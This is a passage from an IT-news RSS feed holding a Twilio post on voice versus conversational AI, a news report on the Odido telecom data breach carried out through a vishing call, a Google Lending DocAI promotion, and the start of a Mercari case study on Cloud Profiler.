<p><a href="https://www.twilio.com/en-us/blog/what-is-conversational-ai?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="noreferrer noopener">Conversational AI</a> is the broader category. It refers to any AI system designed to understand human language, reason about what was said, and respond in a way that feels natural and contextually relevant. That exchange can happen through text, voice, or any other medium.</p>



<p>What defines conversational AI is the intelligence underneath the interaction:</p>



<ul class="wp-block-list">
<li><a href="https://www.twilio.com/docs/glossary/what-is-natural-language-understanding?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Natural language understanding</a> that interprets intent rather than matching keywords</li>



<li>Dialogue management that tracks what’s been said and what still needs to be resolved</li>



<li>Response generation that produces output appropriate to the context.</li>
</ul>



<p>Conversational AI shows up in a lot of forms. A chatbot on a support page is conversational AI. An AI assistant that helps a sales rep draft follow-up emails is conversational AI. A virtual agent that handles inbound customer inquiries is conversational AI.</p>



<p>The intelligence layer makes the interaction feel like a conversation rather than a database lookup.</p>



<p>The channel, the modality, the interface: those are separate from the intelligence. Which brings us to voice AI.</p>



<h2 class="wp-block-heading">Voice AI: The delivery method</h2>



<p><a href="https://www.twilio.com/en-us/blog/insights/what-is-voice-ai?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="noreferrer noopener">Voice AI</a> is conversational AI delivered through spoken language. It’s the application of conversational AI intelligence to voice-based interactions <strong>where the input is speech and the output is speech.</strong></p>



<p>A voice AI system:</p>



<ul class="wp-block-list">
<li>Takes spoken words</li>



<li>Converts them to text via <a href="https://www.twilio.com/en-us/speech-recognition?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">speech-to-text (STT)</a></li>



<li>Runs that text through a <a href="https://www.twilio.com/en-us/products/conversational-ai?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">conversational AI layer</a> to understand intent and generate a response</li>



<li>Converts that response back to spoken audio via <a href="https://www.twilio.com/en-us/blog/insights/ai/what-is-text-to-speech?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">text-to-speech (TTS)</a></li>
</ul>



<p>And it does it all fast enough that the conversation doesn’t feel like it’s buffering.</p>



<p>Voice AI isn’t a fundamentally different kind of intelligence from conversational AI. It’s conversational AI with a voice interface wrapped around it. The reasoning, the context tracking, the dialogue management—those are the same capabilities.</p>



<p>What voice AI adds is the ability to operate through spoken language in real time, with all the additional complexity that introduces: handling interruptions, managing turn-taking, producing natural-sounding speech, and doing all of it with sub-500ms latency.</p>



<p>Ultimately, conversational AI is how the system thinks. Voice AI is how it talks.</p>



<h2 class="wp-block-heading">How they relate</h2>



<p>Voice AI depends on conversational AI to be useful. Without the intelligence layer (intent recognition, context tracking, and coherent response generation), a voice system is just a phone menu with better audio.</p>



<p>The voice interface makes the interaction accessible through speech. The conversational AI makes the interaction worth having.</p>



<p>The relationship goes one way, though.</p>



<p>Every voice AI system uses conversational AI underneath it. But conversational AI doesn’t require voice. A text-based chatbot, messaging bot, or AI assistant embedded in a ticketing system are conversational AI without any voice component.</p>



<p>It’s not really a question of whether you need conversational AI or voice AI. It’s better to ask: does your use case require voice?</p>



<ul class="wp-block-list">
<li>If yes, you need voice AI—which means you also need conversational AI as the foundation.</li>



<li>If the interaction is text-based, you need conversational AI without the voice layer.</li>
</ul>



<h2 class="wp-block-heading"><a></a>Voice AI vs. conversational AI: Key differences</h2>



<p>Side by side, the differences get a lot clearer. Here’s the breakdown across the criteria that matter most for teams building or buying AI for customer service.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/image_b3a549.png" alt="" class="wp-image-4194915" width="630" height="556" sizes="auto, (max-width: 630px) 100vw, 630px"></figure></div>



<h2 class="wp-block-heading">When to use conversational AI without voice</h2>



<p>Text-based conversational AI makes sense when your customers primarily engage through chat, messaging, or digital channels. And when the nature of the interaction doesn’t require the immediacy of a phone call.</p>



<ul class="wp-block-list">
<li>Support chat on a website</li>



<li>WhatsApp automation</li>



<li>AI-assisted email triage</li>



<li>Messaging bots for transactional notifications</li>
</ul>



<p>These are all conversational AI use cases where voice doesn’t add much and may introduce unnecessary friction. Not every customer wants to speak out loud, especially in public, at work, or when the question is simple enough to type in thirty seconds.</p>



<p>Text-based conversational AI is also typically faster to deploy, easier to test, and simpler to update. You can iterate on response quality, test new flows, and review transcripts without dealing with audio quality, latency optimisation, or the additional infrastructure that voice requires.</p>



<p>If your primary support and engagement channels are digital and your customers are comfortable typing, starting with text-based conversational AI often makes more sense than jumping straight to voice.</p>



<h2 class="wp-block-heading"><a></a>When you need voice AI specifically</h2>



<p>Voice AI makes sense when the use case is inherently telephonic, time-sensitive, or requires the kind of nuance that text alone doesn’t capture.</p>



<ul class="wp-block-list">
<li><strong>Inbound phone support: </strong>Customers call because they want to talk to someone, or because they’ve always called, or because the issue feels urgent enough that they don’t want to wait for a chat response. An AI that can answer that call, understand the issue, and resolve it in the same interaction replaces one of the most expensive and frustrating moments in customer service.</li>



<li><strong>Outbound calling:</strong> Appointment reminders, fraud alerts, lead follow-up, proactive outreach for at-risk customers. These interactions are harder to execute over text because they require real-time dialogue.</li>



<li><strong>Context:</strong> Tone, urgency, frustration, hesitation—these are signals that a voice AI system can detect and respond to. A customer who speaks with audible frustration is communicating something beyond the literal words, and a well-designed voice AI system can adjust its approach accordingly.</li>
</ul>



<p>Finally, voice AI matters when your customers are less likely to engage through digital channels. These might be older demographics, industries where phone is still the primary contact method, or use cases where hands-free interaction is a practical requirement.</p>



<h2 class="wp-block-heading">Do you need both?</h2>



<p>For most businesses building serious customer engagement infrastructure: yes.</p>



<p>The customers who prefer chat aren’t going away. Neither are the customers who pick up the phone. A complete AI engagement strategy handles both with a single connected experience rather than two separate systems that don’t know about each other.</p>



<p>And that’s where <a href="https://www.twilio.com/en-us/products/conversational-ai?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="noreferrer noopener">Twilio Conversations</a> can help.</p>



<ul class="wp-block-list">
<li><a href="https://www.twilio.com/en-us/products/conversational-ai/conversation-orchestrator?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Conversation Orchestrator</a> connects voice, SMS, WhatsApp, and chat into one continuous conversation record.</li>



<li><a href="https://www.twilio.com/en-us/products/conversational-ai/conversation-memory?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Conversation Memory</a> gives every agent (AI or human) persistent customer context across channels.</li>



<li><a href="https://www.twilio.com/en-us/products/conversational-ai/conversationrelay?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Conversation Relay</a> handles the voice AI layer: low-latency STT and TTS, bring-your-own-LLM, HIPAA-eligible.</li>



<li><a href="https://www.twilio.com/en-us/products/conversational-ai#:~:text=and%20barge-in.-,Agent%20Connect,-Connect%20your%20own?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Agent Connect</a> lets you plug your own AI agents into Twilio channels without rebuilding your communications infrastructure.</li>
</ul>



<p>Your customers are going to use both voice and text. The question is whether your stack connects them.</p>



<p><a href="https://www.twilio.com/try-twilio?ext-anonymousId=1d804104-edbe-49b6-aed2-edb162421f5b&amp;ext-gaClientId=589905313.1777306679&amp;ext-gaSessionId=1778509973&amp;utm_referrer=https%3A%2F%2Fwww.twilio.com%2Fen-us%2Fproducts%2Fconversational-ai&amp;utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">Start for free</a> or <a href="https://www.twilio.com/en-us/help/sales?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_voiceai-vs-cai_brandposthub" target="_blank" rel="sponsored">contact sales</a> to talk through your use case.</p>



<h2 class="wp-block-heading">Frequently asked questions</h2>



<h3 class="wp-block-heading"><strong>What’s the difference between voice AI and conversational AI?</strong></h3>



<p>Conversational AI is the intelligence layer that understands human language and generates contextually relevant responses, regardless of channel. Voice AI is conversational AI delivered through spoken language. It adds speech-to-text and text-to-speech components so the interaction happens via voice.</p>



<h3 class="wp-block-heading"><strong>Is voice AI a type of conversational AI?</strong></h3>



<p>Yes. Voice AI is a specific application of conversational AI that operates through spoken language. The reasoning, intent recognition, and dialogue management capabilities come from conversational AI. Voice AI adds the speech interface on top to convert spoken input to text, process it through the conversational AI layer, and convert the response back to speech.</p>



<h3 class="wp-block-heading"><strong>Can conversational AI work without voice?</strong></h3>



<p>Yes. Text-based chatbots, messaging bots, AI assistants in ticketing systems, and email AI are all forms of conversational AI that don’t use voice.</p>



<h3 class="wp-block-heading"><strong>Does Twilio support both voice AI and conversational AI?</strong></h3>



<p>Yes. Twilio Conversation Relay handles voice AI, combining low-latency STT and TTS with bring-your-own-LLM flexibility. The broader Twilio Conversations platform connects voice, SMS, WhatsApp, and chat into a single conversation layer, so the conversational AI intelligence and customer context are shared across every channel.</p>



<p>To learn more about Twilio conversations, visit <a href="https://www.twilio.com/en-us/why-twilio?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_end-cta-voiceai-vs-cai_brandposthub" target="_blank" rel="noreferrer noopener">here</a>.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p><a></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vishing Call Becomes Key Lead in Massive Odido Cyberattack]]></title>
<description><![CDATA[The investigation into the Odido cyberattack has uncovered possible involvement of Dutch nationals, according to Dutch police, as authorities continue to investigate the ShinyHunters ransomware-linked attack that exposed the personal data of approximately 6.39 million customers. Law enforcement h...]]></description>
<link>https://tsecurity.de/de/3664411/it-security-nachrichten/vishing-call-becomes-key-lead-in-massive-odido-cyberattack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664411/it-security-nachrichten/vishing-call-becomes-key-lead-in-massive-odido-cyberattack/</guid>
<pubDate>Mon, 13 Jul 2026 08:37:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Odido cyberattack" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Odido-cyberattack-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="Vishing Call Becomes Key Lead in Massive Odido Cyberattack 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="371" data-end="836">The investigation into the Odido cyberattack has uncovered possible involvement of Dutch nationals, according to Dutch police, as authorities continue to investigate the <a href="https://thecyberexpress.com/7-eleven-data-breach-exposes-information/" target="_blank" rel="noopener">ShinyHunters </a>ransomware-linked attack that exposed the personal data of approximately 6.39 million customers. Law enforcement has urged the public to come forward with information as investigators work to identify those responsible for one of the country's largest telecom data breaches.</p>
<p data-start="838" data-end="1313">The cyberattack took place on February 5 and 6 after attackers allegedly used <a href="https://thecyberexpress.com/planning-and-zoning-permit-phishing-scam/" target="_blank" rel="noopener">voice phishing</a> (vishing) to deceive Odido's customer service team.</p>
<p data-start="838" data-end="1313">According to the company, the attackers posed as members of its internal IT staff, gaining unauthorized access before exfiltrating customer <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28940">data</a>. Odido said its teams detected the unauthorized access immediately on both occasions and revoked the attackers' access, but the incident still resulted in a large-scale <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-a-data-breach/" target="_blank" rel="noopener" title="data breach" data-wpil-keyword-link="linked" data-wpil-monitor-id="28941">data breach</a>.</p>

<h3 data-section-id="bnvj72" data-start="1315" data-end="1379"><strong><span role="text">Odido Cyberattack Investigation Finds Possible Dutch Link</span></strong></h3>
<p data-start="1381" data-end="1581">Under the direction of the National Public Prosecution Service, the High Tech <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Crime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28939">Crime</a> Team (THTC) of the National Investigation and Intervention Unit launched an extensive investigation into the breach.</p>
<p data-start="1583" data-end="2006">Authorities <a href="https://www.politie.nl/nieuws/2026/juli/8/onderzoek-naar-hack-odido-wijst-op-mogelijke-betrokkenheid-nederlanders.html" target="_blank" rel="nofollow noopener">said</a> investigators have found strong indications that Dutch criminals may have been involved. One key lead centers on a phone call made shortly before the breach in which a Dutch-speaking man allegedly impersonated an Odido IT employee while speaking with customer service representatives. Police are continuing efforts to identify the caller and have indicated that his voice could be made public if necessary.</p>
<p data-start="2008" data-end="2184">Investigators believe people within <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/" target="_blank" rel="noopener" title="cybercrime" data-wpil-keyword-link="linked" data-wpil-monitor-id="28936">cybercrime</a> circles may have information about those responsible and are encouraging anyone with relevant details to contact law enforcement.</p>

<h3 data-section-id="97lt1j" data-start="2186" data-end="2227"><strong><span role="text">ShinyHunters Named as Threat Actor</span></strong></h3>
<p data-start="2229" data-end="2383">Odido attributed the attack to the cybercriminal group ShinyHunters, which the company said carried out the <a href="https://thecyberexpress.com/how-to-avoid-social-engineering-attacks/" target="_blank" rel="noopener">social engineering</a> campaign.</p>
<p data-start="2385" data-end="2744">Chief Executive Officer Søren Abildgaard acknowledged the incident in a public statement, apologizing to customers and outlining the company's commitment to strengthening its <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28937">cybersecurity</a> capabilities. He said Odido would continue investing in security, improve data protection practices, expand customer support, and share lessons learned from the incident.</p>
<p data-start="2746" data-end="3100">The CEO also explained <a href="https://www.odido.nl/veiligheid-eng" target="_blank" rel="nofollow noopener">why the company refused to pay the ransom</a> demand. According to Odido, paying cybercriminals would reward illegal activity and could encourage future attacks against other Dutch organizations. The company said the decision was made following guidance from authorities, despite knowing that stolen data could eventually be published.</p>

<h3 data-section-id="yaccxz" data-start="3102" data-end="3135"><strong>Millions of Customers Impacted</strong></h3>
<p data-start="3137" data-end="3307">Odido confirmed that approximately 6.39 million active and former customers of Odido and its Ben brand were affected by the breach. Customers of Simpel were not impacted.</p>
<p data-start="3309" data-end="3520">The exposed information varied by individual and included names, addresses, mobile phone numbers, customer numbers, email addresses, IBAN numbers, dates of birth, identification details, nationality, and gender.</p>
<p data-start="3522" data-end="3684">The company clarified that My Odido account passwords, call records, location data, billing information, and scans of identity documents were not compromised.</p>
<p data-start="3686" data-end="4081">Odido also addressed reports claiming customer passwords had been leaked, stating that login <a href="https://thecyberexpress.com/steps-to-create-unbreakable-passwords/" target="_blank" rel="noopener">passwords</a> remain securely encrypted and were never accessible during the attack. Instead, a separate telephone verification field known as "password_c," used as a customer challenge code, was included for a limited number of customers. The company has since discontinued using that verification method.</p>

<h3 data-section-id="ecu6ov" data-start="4083" data-end="4133"><strong>Customer Support and Security Measures Expanded</strong></h3>
<p data-start="4135" data-end="4487">Following the breach, Odido increased customer support by adding more than 140 service agents and introduced additional security measures. These include its "Check je Gesprek" verification service, allowing customers to confirm whether communications claiming to be from Odido are legitimate, along with access to the F-Secure digital security service.</p>
<p data-start="4489" data-end="4697">The telecom provider said all customers identified as affected have been notified by email or SMS, while customer service teams continue assisting users with questions related to their specific data exposure.</p>
<p data-start="4699" data-end="5075">Meanwhile, Dutch authorities expect investigations into the Odido <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-cyber-attack/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28935">cyberattack</a> to continue for several months. Police have also warned that cyberattacks targeting businesses and institutions are becoming increasingly common, urging organizations to strengthen cybersecurity defenses and encouraging citizens to remain vigilant against follow-on <a class="wpil_keyword_link" href="https://cyble.com/cybercrime/fraud/" target="_blank" rel="noopener" title="fraud" data-wpil-keyword-link="linked" data-wpil-monitor-id="28938">fraud</a> and phishing attempts.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lending DocAI fast tracks the home loan process]]></title>
<description><![CDATA[Artificial intelligence (AI) continues to transform industries across the globe, and business decision makers of all kinds are taking notice. One example is the mortgage industry; lending institutions like banks and mortgage brokers process hundreds of pages of borrower paperwork for every loan -...]]></description>
<link>https://tsecurity.de/de/3662838/it-security-nachrichten/lending-docai-fast-tracks-the-home-loan-process/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662838/it-security-nachrichten/lending-docai-fast-tracks-the-home-loan-process/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>Artificial intelligence (AI) continues to transform industries across the globe, and business decision makers of all kinds are taking notice. One example is the mortgage industry; lending institutions like banks and mortgage brokers process hundreds of pages of borrower paperwork for every loan - a heavily manual process that adds thousands of dollars to the cost of issuing a loan. In this industry, borrowers and lenders have high expectations; they want a mortgage document processing solution catered to improving operational efficiency, while ensuring speed and data accuracy. They also want a document automation process that helps enhance their current security and compliance posture.</p><p>At Google, our goal to understand and synthesize the content of the world wide web has given us unparalleled capabilities in extracting structured data from unstructured sources. Through <a href="https://cloud.google.com/solutions/document-ai">Document AI</a>, we've started bringing this technology to some of the largest enterprise content problems in the world. And with <a href="https://cloud.google.com/solutions/lending-doc-ai">Lending DocAI</a>, now in preview, we're delivering our first vertically specialized solution in this realm.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/lending_docai_1.gif" alt="Lending DocAI.gif">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>Lending DocAI is a specialized solution in our Document AI portfolio for the mortgage industry. Unlike more generalized competitive offerings, Lending DocAI provides industry-leading data accuracy for documents relevant to lending. It processes borrowers’ income and asset documents to speed-up loan applications—a notoriously slow and complex process. Lending DocAI leverages a set of specialized models, focused on document types used in mortgage lending, and automates many of the routine document reviews so that mortgage providers can focus on the more value-added decisions. Check out this product <a href="https://youtu.be/akp0zeI6_6c?t=885" target="_blank">demo</a>. </p><p>In short, Lending DocAI helps:  </p><ul><li><p><b>Increase operational efficiency in the loan process</b>: Speed up the mortgage workflow processes (e.g. loan origination and mortgage servicing) to easily process loans and automate document data capture, while ensuring that accuracy and breadth of different documents (e.g. tax statements, income and asset documents) support enterprise readiness.</p></li><li><p><b>Improve home loan experience for borrowers and lenders</b>: Transform the home loan experience by reducing the complexity of document process automation. Enable mortgage applications to be more easily processed across all stages of the mortgage lifecycle, and accelerate time to close in the loan process.</p></li><li><p><b>Support regulatory and compliance requirements</b>: Reduce risk and enhance compliance posture by leveraging a technology stack (e.g. data access controls and transparency, data residency, customer managed encryption keys) that reduces the risk of implementing an AI strategy. It also streamlines data capture in key mortgage processes such as document verification and underwriting.</p></li></ul><h3>Partnering to transform your home loan experience</h3><p>Our <a href="https://cloud.google.com/blog/products/ai-machine-learning/see-how-google-cloud-customers-transform-their-businesses-with-ai">Deployed AI approach</a> is about providing useful solutions to solve business challenges, which is why we’re working with a network of partners in different phases of the loan application process. We are excited to partner with <a href="https://www2.roostify.com/l/273232/2020-10-14/b1246x" target="_blank">Roostify</a> to transform the home loan experience during origination. Roostify makes a point-of-sale digital lending platform that uses Google Cloud Lending DocAI to speed-up mortgage document processing for borrowers and lenders. Roostify has been working with many customers to develop our joint solution, and we have incorporated valuable feedback along the way.</p><p><i>“The mortgage industry is still early in transitioning from traditional, manual processes to digitally-enabled and automated, and we believe that transformation will happen much more quickly with the power of AI. And if you are going to do AI, you’ve got to go Google.” - <b>Rajesh Bhat, Founder and CEO, Roostify</b></i></p><p>Our goal is to give you the right tools to help borrowers and lenders have a better experience and to close mortgage loans in shorter time frames, benefiting all parties involved. With Lending DocAI, you will reduce mortgage processing time and costs, streamline data capture, and support regulatory and compliance requirements.</p><h3>Let’s connect</h3><p>Be sure to tune in to the <a href="https://www.mba.org/conferences-and-education/event-mini-sites/annual-convention-and-expo" target="_blank">Mortgage Bankers Association annual convention</a> to learn more from our <a href="https://www2.roostify.com/l/273232/2020-10-14/b12482" target="_blank">Fireside Chat</a> and <a href="https://www2.roostify.com/l/273232/2020-10-14/b12484" target="_blank">session</a> with Roostify!</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/ai-machine-learning/ai-and-machine-learning-news-from-google-cloud/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Empowering teams to unlock the value of AI</h4>
            <p class="uni-related-article-tout__body">The latest and greatest AI and machine learning news from Google Cloud</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Mercari reduced request latency by 15% with Cloud Profiler]]></title>
<description><![CDATA[Editor’s note: For retailers, predicting consumers’ desires and demand is the holy grail. For retail IT, the goal is understanding the performance of your ecommerce applications. Here, Japanese online retailer Mercari shows how they used Cloud Profiler and Trace to understand a complex microservi...]]></description>
<link>https://tsecurity.de/de/3662835/it-security-nachrichten/how-mercari-reduced-request-latency-by-15-with-cloud-profiler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662835/it-security-nachrichten/how-mercari-reduced-request-latency-by-15-with-cloud-profiler/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p><i><b>Editor’s note</b>: For retailers, predicting consumers’ desires and demand is the holy grail. For retail IT, the goal is understanding the performance of your ecommerce applications. Here, Japanese online retailer Mercari shows how they used Cloud Profiler and Trace to understand a complex microservices-based application running on Google Cloud, to meet rigorous SLOs as demand shifts for their products. </i></p><p>The events of 2020 have accelerated ecommerce, increasing demand for and traffic on online marketplaces. Analyst eMarketer <a href="https://www.emarketer.com/content/us-ecommerce-will-rise-18-2020-amid-pandemic?ecid=NL1001" target="_blank">predicts</a> that ecommerce sales in the United States will grow 18% in 2020, against an overall fall in total retail sales of 10.5% for the year. Likewise, our business—Japan-headquartered consumer-to-consumer marketplace <a href="https://www.mercari.com/us/help_center/article/22" target="_blank">Mercari Inc</a>—is growing rapidly. In the United States alone, we have seen 74% year-on-year growth in monthly average users to 3.4 million. A big part of our success are our robust payment and deposit systems and AI-based fraud monitoring, which enable sellers to list items for purchase and buyers to complete transactions safely. </p><p>Mercari started as a monolithic application but as complexity grew we decided to transition to a microservices architecture. And through it all, tools like Cloud Profiler and Cloud Trace helped us track down performance problems in our code, significantly improving latency.</p><h3>A microservices menagerie</h3><p>Today, we run 80+ microservices on Google Cloud with a mix of languages including Go, Python, JavaScript and Java. To deliver this new architecture, we created a gateway-like microservice to route traffic from soon-to-be migrated monolithic service to the Google Cloud microservices, which  delivers a range of features. </p><p>After creating several microservices, we identified common requirements and created a template to accelerate their development. These common requirements included: </p><ul><li><p>Exporting metrics to Prometheus</p></li><li><p>A gRPC server and interceptors</p></li><li><p>Error Reporting, Cloud Trace and Cloud Profiler. Error Reporting counts, analyzes and aggregates crashes in running cloud services, while Cloud Trace provides a view of requests as they flow through microservices and Cloud Profiler shows how microservices consume CPU, memory and threads.  </p></li></ul><p>We then used Python to create a template for machine learning services, also expediting the creation of new microservices. This has enabled us to grow the number of microservices we use in order to address new requirements. However, as our microservices proliferated, we needed to efficiently monitor and understand their performance. </p><h3>Maintaining SLO a challenge</h3><p>In particular, we needed to monitor the impact of new versions on the production environment and the efficiency of production operations, so we could maintain our service level objective (SLO) for success rates of 99.95% and 350 milliseconds for 95% latency. </p><p>Our engineering team also uses canary deployments to detect issues with new versions of major services. However, despite applying these measures, we found it challenging to maintain our SLO when our business grew faster than expected or during unanticipated spikes in demand. Some issues can be obvious or easy to detect. For example, if a service is experiencing high CPU utilization, we could simply place or fine tune our horizontal pod autoscaler (HPA) to resolve the problem. However, other issues may be less obvious. For example, a drop in performance may not directly be tied to a specific release—it may instead be due to unexpected requests, or may arise from changes to multiple functions in a single code release. </p><h3>Using Cloud Profiler and Cloud Trace to minimize performance issues</h3><p>In particular, our business-critical UserStats service, which tracks the speed with which a user replies to a message and how fast and reliably a seller ships an item, recently started performing poorly. </p><p>New feature requirements had prompted us to track how often a seller cancels an order and provide statistics. However, while adding this new functionality, the change refactored other functions, meaning we were unable to identify the function experiencing reduced performance. Since most of our services are enabled with Cloud Profiler and Cloud Trace, we turned to these products to investigate and identify the root cause.  </p><p>Before the change:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        <a href="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace.max-2800x2800.jpg" rel="external" target="_blank">
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Using_Cloud_Profiler_and_Cloud_Trace.max-1000x1000.jpg" alt="Using Cloud Profiler and Cloud Trace.jpg">
        
        </a>
      
        <figcaption class="article-image__caption "><i>Click to enlarge</i></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>After the change:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

